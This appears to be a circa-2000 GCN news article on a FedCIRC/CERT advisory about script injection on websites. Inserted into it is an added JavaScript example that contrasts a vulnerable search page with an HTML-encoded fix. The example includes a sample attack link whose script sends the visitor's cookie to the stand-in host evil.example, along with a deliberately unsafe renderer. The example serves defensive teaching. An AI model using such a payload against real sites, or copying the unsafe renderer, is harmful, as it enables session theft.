Security experts warn of potential Web site dangers

By Christopher J. Dorobek

GCN Staff

FEB. 4: The Federal Computer Incident Response Capability team is telling agencies to be wary of malicious code surreptitiously embedded in Web scripting that could run in a user's browser when the user visits a Web site, or downloads or provides data online.

An advisory said hackers could use such code to gain access to data on a Web server or to information provided by visitors to a site. FedCIRC said agencies should give the alert a high priority because of the government's increased reliance on the Web as a communications medium.

"Users may unintentionally execute scripts written by an attacker when they follow untrusted links in Web pages, mail messages or newsgroups," the advisory said. "Because the malicious scripts are executed in a context that appears to have originated from the targeted site, the attacker has full access to the document retrieved."

The hole could make it possible for the attacker to get the information even if the user is using Secure Sockets Layer, the most widely used encryption method for protecting information submitted online, the alert said. SSL protects the data only while it is in transit; script injected into the page runs inside the user's browser after the page has been decrypted, so the encryption does not stand in its way.

The General Services Administration's FedCIRC, the Defense Department's Computer Emergency Response Team, DOD's Joint Task Force for Computer Network Defense, the FBI's National Infrastructure Protection Center and Carnegie Mellon University's Computer Emergency Response Team Coordination Center released the alert. It is posted at www2.fedcirc.gov/advisories/FA-2000-02.html.

There are no easy fixes, FedCIRC said. "None of the solutions that Web users can take are complete," it said. "In the end, it is up to the Web page developers to modify their pages to eliminate these types of problems."
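The developer-side fix the advisory points to is to stop untrusted input from reaching the page as live markup. The following is an added example, not code from the advisory, the GCN article or any agency site: a page builder that reflects a search term from the query string as-is, beside a hardened version that HTML-encodes it first. The site name `agency.example`, the `q` parameter, the render functions and the sample attacker link are all constructed for illustration.

```javascript
// Added example (not from the FedCIRC/CERT advisory or the GCN article).
// Shows a reflected-input page builder beside its hardened form.
// Names, the sample link and the sample payload are constructed for illustration.

// Minimal HTML encoder for text content and double-quoted attribute values.
// It replaces the five characters that can change meaning in those contexts.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    '&': '&amp;',
    '<': '&lt;',
    '>': '&gt;',
    '"': '&quot;',
    "'": '&#x27;',
  })[c]);
}

// Vulnerable: the untrusted search term is pasted straight into the page,
// so any tags it carries become part of the document the browser executes.
function renderSearchPageVulnerable(query) {
  return `<html><body><p>Results for: ${query}</p></body></html>`;
}

// Hardened: the same page, with the untrusted value encoded before it lands in markup.
// The browser now shows the attacker's text instead of running it.
function renderSearchPageHardened(query) {
  return `<html><body><p>Results for: ${escapeHtml(query)}</p></body></html>`;
}

// Pull a named parameter out of a link the way a server-side handler would.
function queryParam(url, name) {
  return new URL(url).searchParams.get(name) ?? '';
}

// Rough check used here only to show the difference between the two outputs.
// A real detector would parse the DOM rather than pattern-match the text.
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Constructed attacker link of the kind the advisory warns users not to follow:
// a search URL on the trusted site whose parameter carries a script that ships
// the visitor's cookie to a third party. (Hypothetical hosts.)
const MALICIOUS_LINK =
  'https://agency.example/search?q=' +
  encodeURIComponent(
    '<script>document.location="https://evil.example/?c="+document.cookie</script>'
  );

// Render the attacker's link through both page builders and report whether an
// executable script element survived into the response.
function demo() {
  const q = queryParam(MALICIOUS_LINK, 'q');
  return {
    vulnerable: containsScriptTag(renderSearchPageVulnerable(q)),
    hardened: containsScriptTag(renderSearchPageHardened(q)),
  };
}

console.log(JSON.stringify(demo())); // {"vulnerable":true,"hardened":false}
```

The encoder above covers values placed in element text and quoted attributes, which is the case in the example. A value that ends up inside a URL, a JavaScript string or a style block needs encoding for that context instead; using the wrong encoder is as much a defect as using none.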

There are some measures that Web users can take, such as setting their browsers to disable scripting languages. The warning acknowledged that disabling scripts would result in reduced functionality on some sites. "Users should select this option when they require the lowest possible level of risk," the advisory said.

Another option is for users to be selective in their initial site visits. This will "significantly reduce a user's exposure while still maintaining functionality," the advisory said. "Users should understand that they are accepting more risk when they select this option, but they are doing so in order to preserve functionality that is important to them."

Some agencies already have tough applet and scripting policies.

The Justice Department, for instance, last year banned the use of applets because of concerns about potential vulnerabilities [see GCN story at www.gcn.com/archives/gcn/1999/January11/1.htm]. The department lifted the ban four months later but set specific rules for the use of scripting languages, saying it wanted to balance the need to manage systems risks against the need of Justice employees to use the Web [see story at www.gcn.com/archives/gcn/1999/May3/1.htm].
